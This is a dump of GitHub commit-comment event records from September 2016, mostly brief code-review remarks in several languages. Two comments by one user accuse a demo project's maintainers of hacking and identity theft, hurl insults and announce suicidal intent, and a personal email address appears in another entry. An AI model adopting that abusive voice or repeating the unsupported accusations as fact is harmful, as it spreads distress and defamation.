{"id":"4514899550","type":"CommitCommentEvent","actor":{"login":"randomCoderz"},"repo":{"name":"Lazer7/Manti"},"payload":{"comment":{"id":18895086,"position":null,"line":null,"path":null,"commit_id":"ce6116179b1f5bc96e4f9aa92ecf76626e0fc250","created_at":"2016-09-05T03:03:33Z","updated_at":"2016-09-05T03:03:33Z","body":"This is the messageBoard portion. Hasn't been integrated with the final project. Please look at what features you want and tell me what you guys want and don't want"}},"created_at":"2016-09-05T03:03:33Z"}
{"id":"4514906978","type":"CommitCommentEvent","actor":{"login":"mvergaray"},"repo":{"name":"ISAMARC/documentario"},"payload":{"comment":{"id":18895097,"position":127,"line":79,"path":"public/features/zones/zones.html","commit_id":"3a4258f90714837fc642c727940428fbabb0eb00","created_at":"2016-09-05T03:07:31Z","updated_at":"2016-09-05T03:07:31Z","body":"@lueimg Nuevo Dist +"}},"created_at":"2016-09-05T03:07:31Z"}
{"id":"4514910711","type":"CommitCommentEvent","actor":{"login":"mvergaray"},"repo":{"name":"ISAMARC/documentario"},"payload":{"comment":{"id":18895101,"position":5,"line":19,"path":"server/features/zonesService.js","commit_id":"3a4258f90714837fc642c727940428fbabb0eb00","created_at":"2016-09-05T03:09:29Z","updated_at":"2016-09-05T03:09:29Z","body":"@lueimg which change?"}},"created_at":"2016-09-05T03:09:29Z"}
{"id":"4514915482","type":"CommitCommentEvent","actor":{"login":"zoroarkcity"},"repo":{"name":"zoroarkcity/HitlersSonIsTrumpWhoseSonIsHillaryWhoseSonIsObama"},"payload":{"comment":{"id":18895109,"position":null,"line":null,"path":null,"commit_id":"2f93cf9b3c01a956917ef73fbbfe814fa7b13f25","created_at":"2016-09-05T03:12:08Z","updated_at":"2016-09-05T03:12:08Z","body":"GG"}},"created_at":"2016-09-05T03:12:08Z"}
{"id":"4514918265","type":"CommitCommentEvent","actor":{"login":"zoeyhe"},"repo":{"name":"tencentyun/qcloud-documents"},"payload":{"comment":{"id":18895113,"position":1,"line":1,"path":"product/视频服务/互动直播/运营相关/微信支付证照要求.md","commit_id":"36f384405bc96e1051164aae770b0a81bcbe8555","created_at":"2016-09-05T03:13:40Z","updated_at":"2016-09-05T03:13:40Z","body":"麻烦发布前先预览下效果"}},"created_at":"2016-09-05T03:13:40Z"}
{"id":"4514924365","type":"CommitCommentEvent","actor":{"login":"lueimg"},"repo":{"name":"ISAMARC/documentario"},"payload":{"comment":{"id":18895120,"position":5,"line":19,"path":"server/features/zonesService.js","commit_id":"3a4258f90714837fc642c727940428fbabb0eb00","created_at":"2016-09-05T03:16:57Z","updated_at":"2016-09-05T03:16:57Z","body":"@mvergaray about the change field to Int inDB"}},"created_at":"2016-09-05T03:16:57Z"}
{"id":"4514924658","type":"CommitCommentEvent","actor":{"login":"erolandopc"},"repo":{"name":"erolandopc/plantillaSIE"},"payload":{"comment":{"id":18895121,"position":13,"line":133,"path":"index.html","commit_id":"f3ac25b6a4e731ba8618b411b1b669f4f960c646","created_at":"2016-09-05T03:17:08Z","updated_at":"2016-09-05T03:17:08Z","body":"Permite mostrar el mensaje que los datos se cargan desde una fuente externa."}},"created_at":"2016-09-05T03:17:08Z"}
{"id":"4514925812","type":"CommitCommentEvent","actor":{"login":"erolandopc"},"repo":{"name":"erolandopc/plantillaSIE"},"payload":{"comment":{"id":18895123,"position":21,"line":165,"path":"index.html","commit_id":"f3ac25b6a4e731ba8618b411b1b669f4f960c646","created_at":"2016-09-05T03:17:45Z","updated_at":"2016-09-05T03:17:45Z","body":"Modal que permite mostrar el formulario para agregar o editar un registro."}},"created_at":"2016-09-05T03:17:45Z"}
{"id":"4514931981","type":"CommitCommentEvent","actor":{"login":"phuongli89"},"repo":{"name":"phuongli89/phuongbi0507-gmail.com"},"payload":{"comment":{"id":18895128,"position":null,"line":null,"path":null,"commit_id":"1d3533a0867be67f3afb5452c658172f182e22b1","created_at":"2016-09-05T03:20:58Z","updated_at":"2016-09-05T03:20:58Z","body":"phuongbi0507@gmail.com"}},"created_at":"2016-09-05T03:20:58Z"}
{"id":"4514932317","type":"CommitCommentEvent","actor":{"login":"phuongli89"},"repo":{"name":"phuongli89/phuongbi0507-gmail.com"},"payload":{"comment":{"id":18895129,"position":null,"line":null,"path":null,"commit_id":"1d3533a0867be67f3afb5452c658172f182e22b1","created_at":"2016-09-05T03:21:11Z","updated_at":"2016-09-05T03:21:11Z","body":"1d3533a"}},"created_at":"2016-09-05T03:21:11Z"}
{"id":"4514932748","type":"CommitCommentEvent","actor":{"login":"surajreddy"},"repo":{"name":"meteor/simple-todos"},"payload":{"comment":{"id":18895130,"position":null,"line":null,"path":null,"commit_id":"f345b40d5bf55026d8bb72a771971d06f6cec25e","created_at":"2016-09-05T03:21:25Z","updated_at":"2016-09-05T03:21:25Z","body":"I was editing client/main.js instead of server/main.js as well. Importing tasks in server/main.js fixes the issue."}},"created_at":"2016-09-05T03:21:25Z"}
{"id":"4514932823","type":"CommitCommentEvent","actor":{"login":"phuongli89"},"repo":{"name":"phuongli89/phuongbi0507-gmail.com"},"payload":{"comment":{"id":18895131,"position":null,"line":null,"path":null,"commit_id":"1d3533a0867be67f3afb5452c658172f182e22b1","created_at":"2016-09-05T03:21:27Z","updated_at":"2016-09-05T03:21:27Z","body":"1d3533a"}},"created_at":"2016-09-05T03:21:27Z"}
{"id":"4514934228","type":"CommitCommentEvent","actor":{"login":"phuongli89"},"repo":{"name":"phuongli89/phuongbi0507-gmail.com"},"payload":{"comment":{"id":18895133,"position":2,"line":2,"path":"README.md","commit_id":"1d3533a0867be67f3afb5452c658172f182e22b1","created_at":"2016-09-05T03:22:12Z","updated_at":"2016-09-05T03:22:12Z","body":"1d3533a"}},"created_at":"2016-09-05T03:22:12Z"}
{"id":"4514934614","type":"CommitCommentEvent","actor":{"login":"phuongli89"},"repo":{"name":"phuongli89/phuongbi0507-gmail.com"},"payload":{"comment":{"id":18895135,"position":2,"line":2,"path":"README.md","commit_id":"1d3533a0867be67f3afb5452c658172f182e22b1","created_at":"2016-09-05T03:22:25Z","updated_at":"2016-09-05T03:22:25Z","body":"1d3533a"}},"created_at":"2016-09-05T03:22:25Z"}
{"id":"4514934791","type":"CommitCommentEvent","actor":{"login":"phuongli89"},"repo":{"name":"phuongli89/phuongbi0507-gmail.com"},"payload":{"comment":{"id":18895136,"position":null,"line":null,"path":null,"commit_id":"1d3533a0867be67f3afb5452c658172f182e22b1","created_at":"2016-09-05T03:22:31Z","updated_at":"2016-09-05T03:22:31Z","body":"Nạp"}},"created_at":"2016-09-05T03:22:31Z"}
{"id":"4514938982","type":"CommitCommentEvent","actor":{"login":"LinhHa"},"repo":{"name":"LinhHa/Labs"},"payload":{"comment":{"id":18895145,"position":null,"line":null,"path":null,"commit_id":"0bdf0d9d89986d24e9bf93b2dd08f95a856b8e80","created_at":"2016-09-05T03:25:00Z","updated_at":"2016-09-05T03:25:00Z","body":"Need to find a way to show the divided clock"}},"created_at":"2016-09-05T03:25:00Z"}
{"id":"4514941481","type":"CommitCommentEvent","actor":{"login":"koko654321"},"repo":{"name":"gauntface/simple-push-demo"},"payload":{"comment":{"id":18895148,"position":null,"line":null,"path":null,"commit_id":"c0d9a4483501d16bdd41f1a2a5e85e1efdcbd78f","created_at":"2016-09-05T03:26:21Z","updated_at":"2016-09-05T03:26:21Z","body":"I hope u have fun pushing sick people to the limits of killing them self. Im now in a mental institusion because of u and ur stalker friends bullying me to the limit hacking and destroying several computers and phones i am broke and got canser and only waiting to dieBUT AFTER I FGOT IN THIS MENTAL INSTITUTION BECAUSE OF U IM GOING TO KILL MY SELF SO HAVE A NICE LIFE FUCKING PSYCKO. IM HOPE UR PROUD OF UR SELF KILLING A OLD DEATHSICK WOMAN"}},"created_at":"2016-09-05T03:26:21Z"}
{"id":"4514942117","type":"CommitCommentEvent","actor":{"login":"keloyang"},"repo":{"name":"FengtuWang/docker"},"payload":{"comment":{"id":18895150,"position":14,"line":207,"path":"daemon/daemon_unix.go","commit_id":"989a6bf732124cd380316f1b29010cbcbdefe65f","created_at":"2016-09-05T03:26:42Z","updated_at":"2016-09-05T03:26:42Z","body":"======>\r\n```\r\npriority := specs.InterfacePriority{\r\n    Name: p.Name,\r\n    Priority: p.Priority,\r\n}\r\npriorities = append(priorities, priority )\r\n```"}},"created_at":"2016-09-05T03:26:42Z"}
{"id":"4514942300","type":"CommitCommentEvent","actor":{"login":"Adobe-Osman"},"repo":{"name":"Adobe-Osman/cs2500"},"payload":{"comment":{"id":18895152,"position":null,"line":null,"path":null,"commit_id":"df8f8444bb6e2a54bbff52650bea3d84932c0179","created_at":"2016-09-05T03:26:47Z","updated_at":"2016-09-05T03:26:47Z","body":"NOTE: Read up on [GNU make](https://www.gnu.org/software/make/manual/make.html) (since i basically copy pasted from what [LinuxMercedes](https://github.com/LinuxMercedes) gave me in map_quest) and into the differences between [clang and gcc](http://clang.llvm.org/comparison.html#gcc)."}},"created_at":"2016-09-05T03:26:47Z"}
{"id":"4514947848","type":"CommitCommentEvent","actor":{"login":"andrewda"},"repo":{"name":"FRCTools/Attendance-Client"},"payload":{"comment":{"id":18895158,"position":null,"line":null,"path":null,"commit_id":"53012eebf01200e5c0e7fd4a32bdd9d302e198e1","created_at":"2016-09-05T03:29:48Z","updated_at":"2016-09-05T03:29:48Z","body":"lol"}},"created_at":"2016-09-05T03:29:48Z"}
{"id":"4514951029","type":"CommitCommentEvent","actor":{"login":"koko654321"},"repo":{"name":"gauntface/simple-push-demo"},"payload":{"comment":{"id":18895163,"position":25,"line":62,"path":"test/opera-tests.js","commit_id":"c0d9a4483501d16bdd41f1a2a5e85e1efdcbd78f","created_at":"2016-09-05T03:31:27Z","updated_at":"2016-09-05T03:31:27Z","body":"ps someone at the mentalhospital where i am have been taking screenshots of what u have been doing to all my computers and my bank will report u to the police. In norway we have very high sentenses for economic crime and stealing other peoples identity, so even if i cant take this anymore, u can be shure you are going to jail for a looooong time you evil psycho"}},"created_at":"2016-09-05T03:31:27Z"}
{"id":"4514954262","type":"CommitCommentEvent","actor":{"login":"CarterLi"},"repo":{"name":"lhmouse/mcfgthread"},"payload":{"comment":{"id":18895169,"position":16,"line":19,"path":"src/ext/assert.c","commit_id":"5cc1c72bebe2db6b9f9c8d0c4b5d01c0e52199ee","created_at":"2016-09-05T03:33:09Z","updated_at":"2016-09-05T03:33:09Z","body":"Chinese? Are you kidding?"}},"created_at":"2016-09-05T03:33:09Z"}
{"id":"4514962840","type":"CommitCommentEvent","actor":{"login":"Grewer"},"repo":{"name":"Grewer/P"},"payload":{"comment":{"id":18895176,"position":null,"line":null,"path":null,"commit_id":"6e0cec06ed70acbd800db584c94f9027ddc4e566","created_at":"2016-09-05T03:37:40Z","updated_at":"2016-09-05T03:37:40Z","body":"electrical equipment weisite"}},"created_at":"2016-09-05T03:37:40Z"}
{"id":"4514968744","type":"CommitCommentEvent","actor":{"login":"moypray"},"repo":{"name":"FengtuWang/docker"},"payload":{"comment":{"id":18895186,"position":14,"line":207,"path":"daemon/daemon_unix.go","commit_id":"989a6bf732124cd380316f1b29010cbcbdefe65f","created_at":"2016-09-05T03:40:53Z","updated_at":"2016-09-05T03:40:53Z","body":"Variable “p” is a iterator in config.Priorities,  and then a new var named \"p\",,  it will be confused. so change the name of this variable."}},"created_at":"2016-09-05T03:40:53Z"}
{"id":"4514975746","type":"CommitCommentEvent","actor":{"login":"MrkGrgsn"},"repo":{"name":"DataShades/ckanext-saml2"},"payload":{"comment":{"id":18895192,"position":null,"line":null,"path":null,"commit_id":"b4194f066baae67f87c1d1a1bc84db9fc48c8b5d","created_at":"2016-09-05T03:44:32Z","updated_at":"2016-09-05T03:44:32Z","body":"Thanks for the feedback @bionary. It's been a while since I worked on this and I'm unsure why it would be the case that `REMOTE_USER` is incorrect. Perhaps it is our understanding of `REMOTE_USER` in the SSO context that is incorrect.  \r\n\r\nIf I recall correctly, the change of line 257 was because this didn't work in one or more of the CKAN's we use it in (neither of which use a Shibboleth IdP) so simply reverting the change is likely not the appropriate fix.\r\n\r\nAt least part of the problem is that in our experience, `environ[\"repoze.who.identity\"][\"user\"]` is only set when the user is returned from the IdP and not for subsequent requests, for those requests we only had `REMOTE_USER` to work with."}},"created_at":"2016-09-05T03:44:32Z"}
{"id":"4514977021","type":"CommitCommentEvent","actor":{"login":"Youngsoo77"},"repo":{"name":"Youngsoo77/hello-world-"},"payload":{"comment":{"id":18895195,"position":4,"line":7,"path":"app/src/main/java/HelloWorld.java","commit_id":"2040924f45a25314bffb488c0e7d18d9ec21e28e","created_at":"2016-09-05T03:45:12Z","updated_at":"2016-09-05T03:45:12Z","body":"aaaaa"}},"created_at":"2016-09-05T03:45:12Z"}
{"id":"4514977284","type":"CommitCommentEvent","actor":{"login":"Youngsoo77"},"repo":{"name":"Youngsoo77/hello-world-"},"payload":{"comment":{"id":18895196,"position":5,"line":7,"path":"app/src/main/java/HelloWorld.java","commit_id":"2040924f45a25314bffb488c0e7d18d9ec21e28e","created_at":"2016-09-05T03:45:20Z","updated_at":"2016-09-05T03:45:20Z","body":"aaa22"}},"created_at":"2016-09-05T03:45:20Z"}
{"id":"4514977444","type":"CommitCommentEvent","actor":{"login":"Youngsoo77"},"repo":{"name":"Youngsoo77/hello-world-"},"payload":{"comment":{"id":18895197,"position":null,"line":null,"path":null,"commit_id":"2040924f45a25314bffb488c0e7d18d9ec21e28e","created_at":"2016-09-05T03:45:25Z","updated_at":"2016-09-05T03:45:25Z","body":"asd"}},"created_at":"2016-09-05T03:45:25Z"}
{"id":"4514978460","type":"CommitCommentEvent","actor":{"login":"m1093782566"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":18895200,"position":null,"line":null,"path":null,"commit_id":"aee6d10b5770ff11f52ffc2750cde008b6a638ff","created_at":"2016-09-05T03:45:57Z","updated_at":"2016-09-05T03:45:57Z","body":"nice job!"}},"created_at":"2016-09-05T03:45:57Z"}
{"id":"4514986150","type":"CommitCommentEvent","actor":{"login":"lhmouse"},"repo":{"name":"lhmouse/mcfgthread"},"payload":{"comment":{"id":18895206,"position":16,"line":19,"path":"src/ext/assert.c","commit_id":"5cc1c72bebe2db6b9f9c8d0c4b5d01c0e52199ee","created_at":"2016-09-05T03:50:02Z","updated_at":"2016-09-05T03:50:02Z","body":"@CarterLi \r\n\r\noops."}},"created_at":"2016-09-05T03:50:02Z"}
{"id":"4514986778","type":"CommitCommentEvent","actor":{"login":"syobochim"},"repo":{"name":"backpaper0/agolla"},"payload":{"comment":{"id":18895207,"position":null,"line":null,"path":null,"commit_id":"9428be751984713fb8358cba9cea896c69e87289","created_at":"2016-09-05T03:50:24Z","updated_at":"2016-09-05T03:50:24Z","body":"Questに名前を変えてみたけど、そうなると参加がJoinというのにも違和感を覚えてきた。。。"}},"created_at":"2016-09-05T03:50:24Z"}
{"id":"4514989007","type":"CommitCommentEvent","actor":{"login":"rozzzly"},"repo":{"name":"rozzzly/vscode-jump"},"payload":{"comment":{"id":18895212,"position":14,"line":12,"path":"src/commands/JumpToRelated.ts","commit_id":"fda82853188b72fb2f0918e3713f9cee19fa7fd2","created_at":"2016-09-05T03:51:31Z","updated_at":"2016-09-05T03:51:31Z","body":"Add `injectable()` decorator before `JumpToRelated` class def."}},"created_at":"2016-09-05T03:51:31Z"}
{"id":"4514994494","type":"CommitCommentEvent","actor":{"login":"nikhilmahale"},"repo":{"name":"nikhilmahale/python"},"payload":{"comment":{"id":18895227,"position":null,"line":null,"path":null,"commit_id":"500b56ecd685927347059e1cc08e4da2453f0a16","created_at":"2016-09-05T03:54:27Z","updated_at":"2016-09-05T03:54:27Z","body":"deleted sample .OK"}},"created_at":"2016-09-05T03:54:27Z"}
{"id":"4514995591","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"Tesla-M-Devices/device_lge_vs985"},"payload":{"comment":{"id":18895230,"position":null,"line":null,"path":null,"commit_id":"11c17aa9842f7d515f110e076084e9336d0aaa26","created_at":"2016-09-05T03:55:03Z","updated_at":"2016-09-05T03:55:03Z","body":"Almost right"}},"created_at":"2016-09-05T03:55:03Z"}
{"id":"4514997729","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18895235,"position":null,"line":null,"path":null,"commit_id":"6bb08bfec20c5678a1147022ce3ccc18db94601d","created_at":"2016-09-05T03:56:15Z","updated_at":"2016-09-05T03:56:15Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-05T03:56:15Z"}
{"id":"4514998855","type":"CommitCommentEvent","actor":{"login":"aehmt"},"repo":{"name":"irevived1/vim-tmux-config"},"payload":{"comment":{"id":18895238,"position":null,"line":null,"path":null,"commit_id":"7be5656770ea29d90e422b23bca39cf6c34b3dab","created_at":"2016-09-05T03:56:53Z","updated_at":"2016-09-05T03:56:53Z","body":" Python libraries?"}},"created_at":"2016-09-05T03:56:53Z"}
{"id":"4514999922","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"Tesla-M-Devices/android_device_lge_g3-common"},"payload":{"comment":{"id":18895239,"position":null,"line":null,"path":null,"commit_id":"3cb19c2e1a0f07a4713ea564655c2c1d019de32b","created_at":"2016-09-05T03:57:29Z","updated_at":"2016-09-05T03:57:29Z","body":"You need Irish coffee"}},"created_at":"2016-09-05T03:57:29Z"}
{"id":"4515005808","type":"CommitCommentEvent","actor":{"login":"uniflare"},"repo":{"name":"uniflare/A3MT_GUI"},"payload":{"comment":{"id":18895248,"position":134,"line":205,"path":"Examples/A3MT/Controller.ahk","commit_id":"02f2c7632ee61dc74ede1c13e326d4daee08be20","created_at":"2016-09-05T04:00:32Z","updated_at":"2016-09-05T04:00:32Z","body":"Remove in next commit (Along with any other redundant code)"}},"created_at":"2016-09-05T04:00:32Z"}
{"id":"4515011223","type":"CommitCommentEvent","actor":{"login":"JimLee1996"},"repo":{"name":"JimLee1996/supervisor-onekey"},"payload":{"comment":{"id":18895258,"position":null,"line":null,"path":null,"commit_id":"608210f4e6713f32de6b0d0f0de4e5afcecf58d3","created_at":"2016-09-05T04:03:34Z","updated_at":"2016-09-05T04:03:34Z","body":"example 程序示例配置文件"}},"created_at":"2016-09-05T04:03:34Z"}
{"id":"4515011397","type":"CommitCommentEvent","actor":{"login":"iggy"},"repo":{"name":"saltstack-formulas/postgres-formula"},"payload":{"comment":{"id":18895260,"position":63,"line":45,"path":"postgres/osmap.yaml","commit_id":"a6c4185b8512b99640dfafab5a35e6944cd7d612","created_at":"2016-09-05T04:03:42Z","updated_at":"2016-09-05T04:03:42Z","body":"Easy enough to change that to `{% if 'osmajorrelease' in grains and grains['osmajorrelease'] >= 7 %}`"}},"created_at":"2016-09-05T04:03:42Z"}
{"id":"4515016593","type":"CommitCommentEvent","actor":{"login":"viyo8"},"repo":{"name":"viyo8/your_first_code"},"payload":{"comment":{"id":18895272,"position":null,"line":null,"path":null,"commit_id":"efc8da9c6d8a21ba86c054a70581949b143887a3","created_at":"2016-09-05T04:06:39Z","updated_at":"2016-09-05T04:06:39Z","body":"change line"}},"created_at":"2016-09-05T04:06:39Z"}
{"id":"4515019884","type":"CommitCommentEvent","actor":{"login":"bigdogmat"},"repo":{"name":"roboderpy/dpp"},"payload":{"comment":{"id":18895277,"position":null,"line":null,"path":null,"commit_id":"2a5b49596fd6da2ef1c89553bfa10bbdd2ddd7a4","created_at":"2016-09-05T04:08:36Z","updated_at":"2016-09-05T04:08:36Z","body":"`CPPI.SetOwner` can just be set to `DPP.SetOwner` as well"}},"created_at":"2016-09-05T04:08:36Z"}
{"id":"4515021704","type":"CommitCommentEvent","actor":{"login":"kshvmdn"},"repo":{"name":"cobalt-uoft/uoft-scrapers"},"payload":{"comment":{"id":18895279,"position":null,"line":null,"path":null,"commit_id":"58b205d849c08630a136ff0a17538426106c56a4","created_at":"2016-09-05T04:09:48Z","updated_at":"2016-09-05T04:09:48Z","body":"Looks like `.cobalt_data/` slipped into this. (unless that was intended?)"}},"created_at":"2016-09-05T04:09:48Z"}
{"id":"4515021907","type":"CommitCommentEvent","actor":{"login":"VladimirMangos"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18895280,"position":10,"line":4761,"path":"src/game/Unit.cpp","commit_id":"3b1abf55a2f581a5d9b7937908b385bf297de98b","created_at":"2016-09-05T04:09:56Z","updated_at":"2016-09-05T04:09:56Z","body":"Look horriable\r\nMaybe add to SpellEntry this logic (I not check it)\r\n        inline bool HasAttribute(uint32 attribute, uint32 atttrIndex) const {\r\n                  return !!((&Attributes)[atttrIndex] & attribute);\r\n        }\r\n\r\nBut this will be hard check in case backport to old cores"}},"created_at":"2016-09-05T04:09:56Z"}
{"id":"4515021989","type":"CommitCommentEvent","actor":{"login":"genesis06"},"repo":{"name":"genesis06/Proyecto-Optimizaci-n"},"payload":{"comment":{"id":18895281,"position":null,"line":null,"path":null,"commit_id":"c743d380c927688311cf30c968b99c69ea456cba","created_at":"2016-09-05T04:10:00Z","updated_at":"2016-09-05T04:10:00Z","body":"Son nombres de los objetos; no de etiquetas."}},"created_at":"2016-09-05T04:10:00Z"}
{"id":"4515022245","type":"CommitCommentEvent","actor":{"login":"KierenP"},"repo":{"name":"KierenP/Poker"},"payload":{"comment":{"id":18895283,"position":null,"line":null,"path":null,"commit_id":"4cde68e65ae3037f59ab2d70b7fbe5ae30b66f39","created_at":"2016-09-05T04:10:12Z","updated_at":"2016-09-05T04:10:12Z","body":"Oh and I also removed the file 'old code' that was Anthony's original code"}},"created_at":"2016-09-05T04:10:12Z"}
{"id":"4515024985","type":"CommitCommentEvent","actor":{"login":"FattyVill"},"repo":{"name":"FattyVill/is2"},"payload":{"comment":{"id":18895286,"position":null,"line":null,"path":null,"commit_id":"66a4b87451299ca599e523681f2e63bbe83d1cdc","created_at":"2016-09-05T04:11:53Z","updated_at":"2016-09-05T04:11:53Z","body":"[MiVentas.zip](https://github.com/FattyVill/is2/files/454368/MiVentas.zip)\r\n"}},"created_at":"2016-09-05T04:11:53Z"}
{"id":"4515025389","type":"CommitCommentEvent","actor":{"login":"VladimirMangos"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18895288,"position":null,"line":null,"path":null,"commit_id":"3b1abf55a2f581a5d9b7937908b385bf297de98b","created_at":"2016-09-05T04:12:09Z","updated_at":"2016-09-05T04:12:09Z","body":"I add and remove my hackish suggestion ) @boxa version lot better"}},"created_at":"2016-09-05T04:12:09Z"}
{"id":"4515031791","type":"CommitCommentEvent","actor":{"login":"rozzzly"},"repo":{"name":"rozzzly/vscode-jump"},"payload":{"comment":{"id":18895294,"position":17,"line":17,"path":"src/commands/JumpToRelated.ts","commit_id":"fda82853188b72fb2f0918e3713f9cee19fa7fd2","created_at":"2016-09-05T04:15:55Z","updated_at":"2016-09-05T04:15:55Z","body":"Quick test earlier makes this seem incorrect. It now looks like the prop injection decorator is injecting a unique instance of the specified class binding. But does not support injecting a ref to the  singleton binding declared in `./src/bindings.ts`. \r\n\r\nLook into how desired behavior be achieved."}},"created_at":"2016-09-05T04:15:55Z"}
{"id":"4515032427","type":"CommitCommentEvent","actor":{"login":"Radelave"},"repo":{"name":"Radelave/Tarea1"},"payload":{"comment":{"id":18895295,"position":null,"line":null,"path":null,"commit_id":"40dd455d31552e3951bd2127504f908cd279a96a","created_at":"2016-09-05T04:16:17Z","updated_at":"2016-09-05T04:16:17Z","body":"ok"}},"created_at":"2016-09-05T04:16:17Z"}
{"id":"4515033573","type":"CommitCommentEvent","actor":{"login":"maeldridge"},"repo":{"name":"maeldridge/peter-piper"},"payload":{"comment":{"id":18895297,"position":null,"line":null,"path":null,"commit_id":"b8537d889c478f8abf8af524866a586643255ea3","created_at":"2016-09-05T04:16:51Z","updated_at":"2016-09-05T04:16:51Z","body":"Completed!\r\n\r\nUsed as source:\r\nhttps://teamtreehouse.com/community/how-to-count-the-number-of-times-a-specific-character-appears-in-a-string."}},"created_at":"2016-09-05T04:16:51Z"}
{"id":"4515033736","type":"CommitCommentEvent","actor":{"login":"shwet04"},"repo":{"name":"shwet04/hello-world"},"payload":{"comment":{"id":18895298,"position":1,"line":1,"path":"README.md","commit_id":"8c22e5423bc87ef6055de55731e7813cb629ffe7","created_at":"2016-09-05T04:16:57Z","updated_at":"2016-09-05T04:16:57Z","body":"hey there \r\ni am shweta...new to github..wanna learn code"}},"created_at":"2016-09-05T04:16:57Z"}
{"id":"4515034487","type":"CommitCommentEvent","actor":{"login":"jayber12"},"repo":{"name":"EVSD/EVSD-SITE"},"payload":{"comment":{"id":18895301,"position":null,"line":null,"path":null,"commit_id":"63af8aa7d14e57307611f308ea6a08121ba5fbd5","created_at":"2016-09-05T04:17:23Z","updated_at":"2016-09-05T04:17:23Z","body":"why?"}},"created_at":"2016-09-05T04:17:23Z"}
{"id":"4515037537","type":"CommitCommentEvent","actor":{"login":"aeolyus"},"repo":{"name":"EVSD/EVSD-SITE"},"payload":{"comment":{"id":18895305,"position":null,"line":null,"path":null,"commit_id":"63af8aa7d14e57307611f308ea6a08121ba5fbd5","created_at":"2016-09-05T04:19:07Z","updated_at":"2016-09-05T04:19:07Z","body":"Same"}},"created_at":"2016-09-05T04:19:07Z"}
{"id":"4515037573","type":"CommitCommentEvent","actor":{"login":"irevived1"},"repo":{"name":"irevived1/vim-tmux-config"},"payload":{"comment":{"id":18895306,"position":null,"line":null,"path":null,"commit_id":"7be5656770ea29d90e422b23bca39cf6c34b3dab","created_at":"2016-09-05T04:19:08Z","updated_at":"2016-09-05T04:19:08Z","body":"It was for YCM. Will be replaced by neocomplete. "}},"created_at":"2016-09-05T04:19:08Z"}
{"id":"4515047435","type":"CommitCommentEvent","actor":{"login":"lanbosm"},"repo":{"name":"lanbosm/test"},"payload":{"comment":{"id":18895322,"position":2,"line":2,"path":"readme.md","commit_id":"6859812e18840230524150c96d127daf7b6778e8","created_at":"2016-09-05T04:24:44Z","updated_at":"2016-09-05T04:24:44Z","body":"这里是修改点"}},"created_at":"2016-09-05T04:24:44Z"}
{"id":"4515048581","type":"CommitCommentEvent","actor":{"login":"svladykin"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":18895325,"position":null,"line":null,"path":null,"commit_id":"5b8374a2a9ef74aaab5a9b156bceee30cc7bfb48","created_at":"2016-09-05T04:25:22Z","updated_at":"2016-09-05T04:25:22Z","body":"This fall through bug made difference only for JAVA_OBJECT case and before the fix it threw exception. Of course this behavior is accidental, but in my view is correct (until we support correct JAVA_OBJECT conversions for other types). After fixing the fall through it stopped failing and it was possible to get a wrong conversion, I mean you could store UUID as JAVA_OBJECT and then convert it to UUID and receive completely wrong UUID as a result. Thus I prohibited this to happen."}},"created_at":"2016-09-05T04:25:22Z"}
{"id":"4515050381","type":"CommitCommentEvent","actor":{"login":"fanyeren"},"repo":{"name":"lxc/lxc"},"payload":{"comment":{"id":18895328,"position":null,"line":null,"path":null,"commit_id":"8eb62c245e9b67b451ba0766f3ecd7c6f2081d73","created_at":"2016-09-05T04:26:22Z","updated_at":"2016-09-05T04:26:22Z","body":"after remove this symbolic（sigpwr） link， systemd-shutdownd hung in stopping container, so i think it's not a good idea to do this"}},"created_at":"2016-09-05T04:26:22Z"}
{"id":"4515050917","type":"CommitCommentEvent","actor":{"login":"fanyeren"},"repo":{"name":"lxc/lxc"},"payload":{"comment":{"id":18895329,"position":null,"line":null,"path":null,"commit_id":"1f42bbcec59596fbf584c3822d83431ebdf5dfbe","created_at":"2016-09-05T04:26:40Z","updated_at":"2016-09-05T04:26:40Z","body":"after remove this symbolic（sigpwr） link， systemd-shutdownd hung in stopping container, so i think it's not a good idea to do this"}},"created_at":"2016-09-05T04:26:40Z"}
{"id":"4515051578","type":"CommitCommentEvent","actor":{"login":"countrysince"},"repo":{"name":"Samsung/GearVRf"},"payload":{"comment":{"id":18895331,"position":1,"line":127,"path":"GVRf/Framework/framework/src/main/java/org/gearvrf/GVRScene.java","commit_id":"4eda62b7b4ac393f5fa837e05f7c1f3b305e4f3e","created_at":"2016-09-05T04:27:03Z","updated_at":"2016-09-05T04:27:03Z","body":"K127,12+127,,23"}},"created_at":"2016-09-05T04:27:03Z"}
{"id":"4515054197","type":"CommitCommentEvent","actor":{"login":"countrysince"},"repo":{"name":"Samsung/GearVRf"},"payload":{"comment":{"id":18895336,"position":3,"line":129,"path":"GVRf/Framework/framework/src/main/java/org/gearvrf/GVRScene.java","commit_id":"4eda62b7b4ac393f5fa837e05f7c1f3b305e4f3e","created_at":"2016-09-05T04:28:33Z","updated_at":"2016-09-05T04:28:33Z","body":"130"}},"created_at":"2016-09-05T04:28:33Z"}
{"id":"4515054606","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18895339,"position":null,"line":null,"path":null,"commit_id":"6df846ffec9fb0c0c0aeece686876072ccedafd0","created_at":"2016-09-05T04:28:49Z","updated_at":"2016-09-05T04:28:49Z","body":"Also see [Clang 3.6 cannot compile program with -std=c++14](http://bugs.launchpad.net/ubuntu/+bug/1620181) on Launchpad."}},"created_at":"2016-09-05T04:28:49Z"}
{"id":"4515059814","type":"CommitCommentEvent","actor":{"login":"MajorPlayz"},"repo":{"name":"PeaceOfDevs/ServerCore"},"payload":{"comment":{"id":18895343,"position":null,"line":null,"path":null,"commit_id":"47655ef90569108be6ea03a31d42b7fbf28d47eb","created_at":"2016-09-05T04:31:37Z","updated_at":"2016-09-05T04:31:37Z","body":"grammar"}},"created_at":"2016-09-05T04:31:37Z"}
